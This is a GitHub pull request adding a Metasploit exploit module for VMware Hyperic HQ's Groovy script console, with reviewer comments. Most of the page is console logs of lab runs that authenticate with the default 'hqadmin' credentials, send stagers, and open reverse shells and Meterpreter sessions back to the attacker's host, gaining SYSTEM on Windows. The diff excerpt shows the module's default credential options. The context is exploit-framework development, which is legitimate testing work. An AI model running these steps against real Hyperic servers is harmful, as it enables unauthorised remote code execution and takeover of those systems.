Add VMware Hyperic HQ Groovy Script-Console Java Execution #2502

Merged
merged 1 commit into from Oct 11, 2013

Projects

None yet

2 participants

@bcoles
Contributor
bcoles commented Oct 10, 2013

Add VMware Hyperic HQ Groovy Script-Console Java Execution module.

VMware Hyperic HQ Groovy Script-Console Java Execution

Check

msf exploit(hyperic_hq_script_console) > check

[*] 192.168.124.212:7443 - Authenticating as 'hqadmin'
[+] 192.168.124.212:7443 - Authenticated successfully as 'hqadmin'
[*] 192.168.124.212:7443 - Checking access to the script console
[+] The target is vulnerable.

Run

msf exploit(hyperic_hq_script_console) > run

[*] Started reverse handler on 192.168.124.180:4444 
[+] 192.168.124.212:7443 - Authenticated successfully as 'hqadmin'
[*] 192.168.124.212:7443 - Checking access to the script console
[*] 192.168.124.212:7443 - Sending VBS stager...
[*] Command Stager progress -   2.01% done (2048/101881 bytes)
[*] Command Stager progress -   4.02% done (4096/101881 bytes)
[*] Command Stager progress -   6.03% done (6144/101881 bytes)
[*] Command Stager progress -   8.04% done (8192/101881 bytes)
[*] Command Stager progress -  10.05% done (10240/101881 bytes)
[*] Command Stager progress -  12.06% done (12288/101881 bytes)
[*] Command Stager progress -  14.07% done (14336/101881 bytes)
[*] Command Stager progress -  16.08% done (16384/101881 bytes)
[*] Command Stager progress -  18.09% done (18432/101881 bytes)
[*] Command Stager progress -  20.10% done (20480/101881 bytes)
[*] Command Stager progress -  22.11% done (22528/101881 bytes)
[*] Command Stager progress -  24.12% done (24576/101881 bytes)
[*] Command Stager progress -  26.13% done (26624/101881 bytes)
[*] Command Stager progress -  28.14% done (28672/101881 bytes)
[*] Command Stager progress -  30.15% done (30720/101881 bytes)
[*] Command Stager progress -  32.16% done (32768/101881 bytes)
[*] Command Stager progress -  34.17% done (34816/101881 bytes)
[*] Command Stager progress -  36.18% done (36864/101881 bytes)
[*] Command Stager progress -  38.19% done (38912/101881 bytes)
[*] Command Stager progress -  40.20% done (40960/101881 bytes)
[*] Command Stager progress -  42.21% done (43008/101881 bytes)
[*] Command Stager progress -  44.22% done (45056/101881 bytes)
[*] Command Stager progress -  46.23% done (47104/101881 bytes)
[*] Command Stager progress -  48.24% done (49152/101881 bytes)
[*] Command Stager progress -  50.25% done (51200/101881 bytes)
[*] Command Stager progress -  52.26% done (53248/101881 bytes)
[*] Command Stager progress -  54.28% done (55296/101881 bytes)
[*] Command Stager progress -  56.29% done (57344/101881 bytes)
[*] Command Stager progress -  58.30% done (59392/101881 bytes)
[*] Command Stager progress -  60.31% done (61440/101881 bytes)
[*] Command Stager progress -  62.32% done (63488/101881 bytes)
[*] Command Stager progress -  64.33% done (65536/101881 bytes)
[*] Command Stager progress -  66.34% done (67584/101881 bytes)
[*] Command Stager progress -  68.35% done (69632/101881 bytes)
[*] Command Stager progress -  70.36% done (71680/101881 bytes)
[*] Command Stager progress -  72.37% done (73728/101881 bytes)
[*] Command Stager progress -  74.38% done (75776/101881 bytes)
[*] Command Stager progress -  76.39% done (77824/101881 bytes)
[*] Command Stager progress -  78.40% done (79872/101881 bytes)
[*] Command Stager progress -  80.41% done (81920/101881 bytes)
[*] Command Stager progress -  82.42% done (83968/101881 bytes)
[*] Command Stager progress -  84.43% done (86016/101881 bytes)
[*] Command Stager progress -  86.44% done (88064/101881 bytes)
[*] Command Stager progress -  88.45% done (90112/101881 bytes)
[*] Command Stager progress -  90.46% done (92160/101881 bytes)
[*] Command Stager progress -  92.47% done (94208/101881 bytes)
[*] Command Stager progress -  94.48% done (96256/101881 bytes)
[*] Command Stager progress -  96.49% done (98304/101881 bytes)
[*] Command Stager progress -  98.50% done (100348/101881 bytes)
[*] Command Stager progress - 100.00% done (101881/101881 bytes)
[*] Sending stage (770048 bytes) to 192.168.124.212
[*] Meterpreter session 1 opened (192.168.124.180:4444 -> 192.168.124.212:1084) at 2013-10-10 15:08:41 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
@bcoles

I got bored. Only a Windows target is provided.

If installed, the 'Hyperic HQ Server' Windows service runs as 'Local System' by default.

@bcoles

The Groovy console executes arbitrary Java code (and operating system commands) by design so DisclosureDate may not be applicable here.

@jvazquez-r7
Contributor

Processing....

@jvazquez-r7 jvazquez-r7 commented on the diff Oct 11, 2013
modules/exploits/multi/http/hyperic_hq_script_console.rb
+ ],
+ 'Privileged' => true,
+ 'DisclosureDate' => 'Oct 10 2013',
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptBool.new('SSL', [true, 'Use SSL', true]),
+ Opt::RPORT(7443),
+ OptString.new('USERNAME', [ true, 'The username for the application', 'hqadmin' ]),
+ OptString.new('PASSWORD', [ true, 'The password for the application', 'hqadmin' ]),
+ OptString.new('TARGETURI', [ true, 'The path to HypericHQ', '/' ]),
+ ], self.class)
+ end
+
+ def peer
@jvazquez-r7
jvazquez-r7 Oct 11, 2013 Contributor

You don't need this method because Msf::Exploit::Remote::HttpClient is already providing it

@jvazquez-r7
Contributor

The CMD ("unix") platform is working:

msf exploit(hyperic_hq_script_console) > set target 2
target => 2
msf exploit(hyperic_hq_script_console) > rexploit
[*] Reloading module...

[*] Started reverse double handler
[+] 192.168.172.134:7080 - Authenticated successfully as 'hqadmin'
[*] 192.168.172.134:7080 - Checking access to the script console
[*] 192.168.172.134:7080 - Sending UNIX payload...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo L9QHQ6xIeHRfeX1o;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "L9QHQ6xIeHRfeX1o\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (192.168.172.1:4444 -> 192.168.172.134:38345) at 2013-10-11 11:57:17 -0500

id
uid=1001(hyperic) gid=1001(hyperic) groups=4(adm),20(dialout),21(fax),24(cdrom),25(floppy),26(tape),30(dip),44(video),46(plugdev),104(fuse),121(nopasswdlogin),1001(hyperic)
^C
Abort session 2? [y/N]  y

[*] 192.168.172.134 - Command shell session 2 closed.  Reason: User exit

But not the linux one :\ checking if I can spot what is happening:

msf exploit(hyperic_hq_script_console) > set target 1
target => 1
msf exploit(hyperic_hq_script_console) > set payload linux/x86/meterpreter/reverse_tcp 
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(hyperic_hq_script_console) > check

[*] 192.168.172.134:7080 - Authenticating as 'hqadmin'
[+] 192.168.172.134:7080 - Authenticated successfully as 'hqadmin'
[*] 192.168.172.134:7080 - Checking access to the script console
[+] The target is vulnerable.
msf exploit(hyperic_hq_script_console) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[+] 192.168.172.134:7080 - Authenticated successfully as 'hqadmin'
[*] 192.168.172.134:7080 - Checking access to the script console
[*] 192.168.172.134:7080 - Sending Linux stager...
[*] Exploit completed, but no session was created.

@jvazquez-r7
Contributor
  • But working with linux/x86/shell/reverse_tcp... digging
msf exploit(hyperic_hq_script_console) > set payload linux/x86/shell/reverse_tcp 
payload => linux/x86/shell/reverse_tcp
msf exploit(hyperic_hq_script_console) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[+] 192.168.172.134:7080 - Authenticated successfully as 'hqadmin'
[*] 192.168.172.134:7080 - Checking access to the script console
[*] 192.168.172.134:7080 - Sending Linux stager...
[*] Sending stage (36 bytes) to 192.168.172.134
[*] Command shell session 3 opened (192.168.172.1:4444 -> 192.168.172.134:38349) at 2013-10-11 12:02:29 -0500
[!] 192.168.172.134:7080 - Deleting /tmp/cUxh15 payload file

id
uid=1001(hyperic) gid=1001(hyperic) groups=4(adm),20(dialout),21(fax),24(cdrom),25(floppy),26(tape),30(dip),44(video),46(plugdev),104(fuse),121(nopasswdlogin),1001(hyperic)
^C
Abort session 3? [y/N]  y

@jvazquez-r7
Contributor
  • oooum working with meterpreter too.... maybe jsut something weird
msf exploit(hyperic_hq_script_console) > set payload linux/x86/meterpreter/reverse_tcp 
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(hyperic_hq_script_console) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[+] 192.168.172.134:7080 - Authenticated successfully as 'hqadmin'
[*] 192.168.172.134:7080 - Checking access to the script console
[*] 192.168.172.134:7080 - Sending Linux stager...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.172.134
[*] Meterpreter session 4 opened (192.168.172.1:4444 -> 192.168.172.134:38350) at 2013-10-11 12:03:27 -0500
[!] 192.168.172.134:7080 - Deleting /tmp/cdLxkV9x payload file

meterpreter > id
[-] Unknown command: id.
meterpreter > getuid
Server username: uid=1001, gid=1001, euid=1001, egid=1001, suid=1001, sgid=1001
meterpreter > sysinfo
Computer     : ubuntu
OS           : Linux ubuntu 2.6.32-38-generic #83-Ubuntu SMP Wed Jan 4 11:13:04 UTC 2012 (i686)
Architecture : i686
Meterpreter  : x86/linux
meterpreter > 

@jvazquez-r7 jvazquez-r7 pushed a commit that referenced this pull request Oct 11, 2013
jvazquez-r7 Lnad #2502, @bcoles's exploit for VMware Hyperic 11b6512
@jvazquez-r7 jvazquez-r7 merged commit 276ea22 into rapid7:master Oct 11, 2013

1 check passed

default The Travis CI build passed
Details
@jvazquez-r7
Contributor

Hi @bcoles, landed, thanks for another contribution!

Just cleaned it a little, checked the linux and unix targets, and add an automatic target to autodetect so now module is ExcelentRanking. Please review changes here: 0b93996

All the test results:

Automatic target:

  • Linux
msf exploit(hyperic_hq_script_console) > set payload linux/x86/shell/reverse_tcp 
payload => linux/x86/shell/reverse_tcp
msf exploit(hyperic_hq_script_console) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[+] 192.168.172.134:7443 - Authenticated successfully as 'hqadmin'
[*] 192.168.172.134:7443 - Checking access to the script console
[*] 192.168.172.134:7443 - Trying to detect the remote target...
[+] 192.168.172.134:7443 - Linux target found
[*] 192.168.172.134:7443 - Sending Linux stager...
[*] Sending stage (36 bytes) to 192.168.172.134
[*] Command shell session 1 opened (192.168.172.1:4444 -> 192.168.172.134:38355) at 2013-10-11 13:10:09 -0500
[!] 192.168.172.134:7443 - Deleting /tmp/H29xDl5 payload file

id
uid=1001(hyperic) gid=1001(hyperic) groups=4(adm),20(dialout),21(fax),24(cdrom),25(floppy),26(tape),30(dip),44(video),46(plugdev),104(fuse),121(nopasswdlogin),1001(hyperic)
^C
Abort session 1? [y/N]  y

[*] 192.168.172.134 - Command shell session 1 closed.  Reason: User exit
msf exploit(hyperic_hq_script_console) > 

  • Windows
msf exploit(hyperic_hq_script_console) > set target 0
target => 0
msf exploit(hyperic_hq_script_console) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[+] 192.168.172.136:7443 - Authenticated successfully as 'hqadmin'
[*] 192.168.172.136:7443 - Checking access to the script console
[*] 192.168.172.136:7443 - Trying to detect the remote target...
[+] 192.168.172.136:7443 - Windows target found
[*] 192.168.172.136:7443 - Sending VBS stager...
[*] Command Stager progress -   2.01% done (2048/101881 bytes)
[*] Command Stager progress -   4.02% done (4096/101881 bytes)
[*] Command Stager progress -   6.03% done (6144/101881 bytes)
[*] Command Stager progress -   8.04% done (8192/101881 bytes)
[*] Command Stager progress -  10.05% done (10240/101881 bytes)
[*] Command Stager progress -  12.06% done (12288/101881 bytes)
[*] Command Stager progress -  14.07% done (14336/101881 bytes)
[*] Command Stager progress -  16.08% done (16384/101881 bytes)
[*] Command Stager progress -  18.09% done (18432/101881 bytes)
[*] Command Stager progress -  20.10% done (20480/101881 bytes)
[*] Command Stager progress -  22.11% done (22528/101881 bytes)
[*] Command Stager progress -  24.12% done (24576/101881 bytes)
[*] Command Stager progress -  26.13% done (26624/101881 bytes)
[*] Command Stager progress -  28.14% done (28672/101881 bytes)
[*] Command Stager progress -  30.15% done (30720/101881 bytes)
[*] Command Stager progress -  32.16% done (32768/101881 bytes)
[*] Command Stager progress -  34.17% done (34816/101881 bytes)
[*] Command Stager progress -  36.18% done (36864/101881 bytes)
[*] Command Stager progress -  38.19% done (38912/101881 bytes)
[*] Command Stager progress -  40.20% done (40960/101881 bytes)
[*] Command Stager progress -  42.21% done (43008/101881 bytes)
[*] Command Stager progress -  44.22% done (45056/101881 bytes)
[*] Command Stager progress -  46.23% done (47104/101881 bytes)
[*] Command Stager progress -  48.24% done (49152/101881 bytes)
[*] Command Stager progress -  50.25% done (51200/101881 bytes)
[*] Command Stager progress -  52.26% done (53248/101881 bytes)
[*] Command Stager progress -  54.28% done (55296/101881 bytes)
[*] Command Stager progress -  56.29% done (57344/101881 bytes)
[*] Command Stager progress -  58.30% done (59392/101881 bytes)
[*] Command Stager progress -  60.31% done (61440/101881 bytes)
[*] Command Stager progress -  62.32% done (63488/101881 bytes)
[*] Command Stager progress -  64.33% done (65536/101881 bytes)
[*] Command Stager progress -  66.34% done (67584/101881 bytes)
[*] Command Stager progress -  68.35% done (69632/101881 bytes)
[*] Command Stager progress -  70.36% done (71680/101881 bytes)
[*] Command Stager progress -  72.37% done (73728/101881 bytes)
[*] Command Stager progress -  74.38% done (75776/101881 bytes)
[*] Command Stager progress -  76.39% done (77824/101881 bytes)
[*] Command Stager progress -  78.40% done (79872/101881 bytes)
[*] Command Stager progress -  80.41% done (81920/101881 bytes)
[*] Command Stager progress -  82.42% done (83968/101881 bytes)
[*] Command Stager progress -  84.43% done (86016/101881 bytes)
[*] Command Stager progress -  86.44% done (88064/101881 bytes)
[*] Command Stager progress -  88.45% done (90112/101881 bytes)
[*] Command Stager progress -  90.46% done (92160/101881 bytes)
[*] Command Stager progress -  92.47% done (94208/101881 bytes)
[*] Command Stager progress -  94.48% done (96256/101881 bytes)
[*] Command Stager progress -  96.49% done (98304/101881 bytes)
[*] Command Stager progress -  98.50% done (100348/101881 bytes)
[*] Command Stager progress - 100.00% done (101881/101881 bytes)
[*] Sending stage (770048 bytes) to 192.168.172.136
[*] Meterpreter session 5 opened (192.168.172.1:4444 -> 192.168.172.136:1051) at 2013-10-11 13:18:25 -0500

meterpreter > getuid
sServer username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
eComputer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.136 - Meterpreter session 5 closed.  Reason: User exit
msf exploit(hyperic_hq_script_console) > 

Manual target

  • Linux
msf exploit(hyperic_hq_script_console) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   1   Windows
   2   Linux
   3   Unix CMD


msf exploit(hyperic_hq_script_console) > set target 2
target => 2
msf exploit(hyperic_hq_script_console) > set payload linux/x86/meterpreter/reverse_tcp 
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(hyperic_hq_script_console) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[+] 192.168.172.134:7443 - Authenticated successfully as 'hqadmin'
[*] 192.168.172.134:7443 - Checking access to the script console
[*] 192.168.172.134:7443 - Sending Linux stager...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.172.134
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.134:38356) at 2013-10-11 13:11:24 -0500
[!] 192.168.172.134:7443 - Deleting /tmp/8ymC47 payload file

meterpreter > getuid
Server username: uid=1001, gid=1001, euid=1001, egid=1001, suid=1001, sgid=1001
meterpreter > sysinfo
eComputer     : ubuntu
OS           : Linux ubuntu 2.6.32-38-generic #83-Ubuntu SMP Wed Jan 4 11:13:04 UTC 2012 (i686)
Architecture : i686
Meterpreter  : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.134 - Meterpreter session 2 closed.  Reason: User exit

  • unix
msf exploit(hyperic_hq_script_console) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   1   Windows
   2   Linux
   3   Unix CMD


msf exploit(hyperic_hq_script_console) > set target 3
target => 3
msf exploit(hyperic_hq_script_console) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(hyperic_hq_script_console) > rexploit
[*] Reloading module...

[*] Started reverse double handler
[+] 192.168.172.134:7443 - Authenticated successfully as 'hqadmin'
[*] 192.168.172.134:7443 - Checking access to the script console
[*] 192.168.172.134:7443 - Sending UNIX payload...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 1tfXkyIEd1DnyXem;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "1tfXkyIEd1DnyXem\r\n"
[*] Matching...
[*] B is input...
i[*] Command shell session 3 opened (192.168.172.1:4444 -> 192.168.172.134:38358) at 2013-10-11 13:12:21 -0500
d

uid=1001(hyperic) gid=1001(hyperic) groups=4(adm),20(dialout),21(fax),24(cdrom),25(floppy),26(tape),30(dip),44(video),46(plugdev),104(fuse),121(nopasswdlogin),1001(hyperic)

  • Windows
msf exploit(hyperic_hq_script_console) > set target 1
target => 1
msf exploit(hyperic_hq_script_console) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(hyperic_hq_script_console) > check

[*] 192.168.172.136:7443 - Authenticating as 'hqadmin'
[+] 192.168.172.136:7443 - Authenticated successfully as 'hqadmin'
[*] 192.168.172.136:7443 - Checking access to the script console
[+] The target is vulnerable.
msf exploit(hyperic_hq_script_console) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[+] 192.168.172.136:7443 - Authenticated successfully as 'hqadmin'
[*] 192.168.172.136:7443 - Checking access to the script console
[*] 192.168.172.136:7443 - Sending VBS stager...
[*] Command Stager progress -   2.01% done (2048/101881 bytes)
[*] Command Stager progress -   4.02% done (4096/101881 bytes)
[*] Command Stager progress -   6.03% done (6144/101881 bytes)
[*] Command Stager progress -   8.04% done (8192/101881 bytes)
[*] Command Stager progress -  10.05% done (10240/101881 bytes)
[*] Command Stager progress -  12.06% done (12288/101881 bytes)
[*] Command Stager progress -  14.07% done (14336/101881 bytes)
[*] Command Stager progress -  16.08% done (16384/101881 bytes)
[*] Command Stager progress -  18.09% done (18432/101881 bytes)
[*] Command Stager progress -  20.10% done (20480/101881 bytes)
[*] Command Stager progress -  22.11% done (22528/101881 bytes)
[*] Command Stager progress -  24.12% done (24576/101881 bytes)
[*] Command Stager progress -  26.13% done (26624/101881 bytes)
[*] Command Stager progress -  28.14% done (28672/101881 bytes)
[*] Command Stager progress -  30.15% done (30720/101881 bytes)
[*] Command Stager progress -  32.16% done (32768/101881 bytes)
[*] Command Stager progress -  34.17% done (34816/101881 bytes)
[*] Command Stager progress -  36.18% done (36864/101881 bytes)
[*] Command Stager progress -  38.19% done (38912/101881 bytes)
[*] Command Stager progress -  40.20% done (40960/101881 bytes)
[*] Command Stager progress -  42.21% done (43008/101881 bytes)
[*] Command Stager progress -  44.22% done (45056/101881 bytes)
[*] Command Stager progress -  46.23% done (47104/101881 bytes)
[*] Command Stager progress -  48.24% done (49152/101881 bytes)
[*] Command Stager progress -  50.25% done (51200/101881 bytes)
[*] Command Stager progress -  52.26% done (53248/101881 bytes)
[*] Command Stager progress -  54.28% done (55296/101881 bytes)
[*] Command Stager progress -  56.29% done (57344/101881 bytes)
[*] Command Stager progress -  58.30% done (59392/101881 bytes)
[*] Command Stager progress -  60.31% done (61440/101881 bytes)
[*] Command Stager progress -  62.32% done (63488/101881 bytes)
[*] Command Stager progress -  64.33% done (65536/101881 bytes)
[*] Command Stager progress -  66.34% done (67584/101881 bytes)
[*] Command Stager progress -  68.35% done (69632/101881 bytes)
[*] Command Stager progress -  70.36% done (71680/101881 bytes)
[*] Command Stager progress -  72.37% done (73728/101881 bytes)
[*] Command Stager progress -  74.38% done (75776/101881 bytes)
[*] Command Stager progress -  76.39% done (77824/101881 bytes)
[*] Command Stager progress -  78.40% done (79872/101881 bytes)
[*] Command Stager progress -  80.41% done (81920/101881 bytes)
[*] Command Stager progress -  82.42% done (83968/101881 bytes)
[*] Command Stager progress -  84.43% done (86016/101881 bytes)
[*] Command Stager progress -  86.44% done (88064/101881 bytes)
[*] Command Stager progress -  88.45% done (90112/101881 bytes)
[*] Command Stager progress -  90.46% done (92160/101881 bytes)
[*] Command Stager progress -  92.47% done (94208/101881 bytes)
[*] Command Stager progress -  94.48% done (96256/101881 bytes)
[*] Command Stager progress -  96.49% done (98304/101881 bytes)
[*] Command Stager progress -  98.50% done (100348/101881 bytes)
[*] Command Stager progress - 100.00% done (101881/101881 bytes)
[*] Sending stage (770048 bytes) to 192.168.172.136
[*] Meterpreter session 4 opened (192.168.172.1:4444 -> 192.168.172.136:1050) at 2013-10-11 13:17:28 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.172.136 - Meterpreter session 4 closed.  Reason: User exit
msf exploit(hyperic_hq_script_console) > 

@bcoles
Contributor
bcoles commented Oct 11, 2013

Cool. Thanks for cleaning this up. 🔨🐢

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment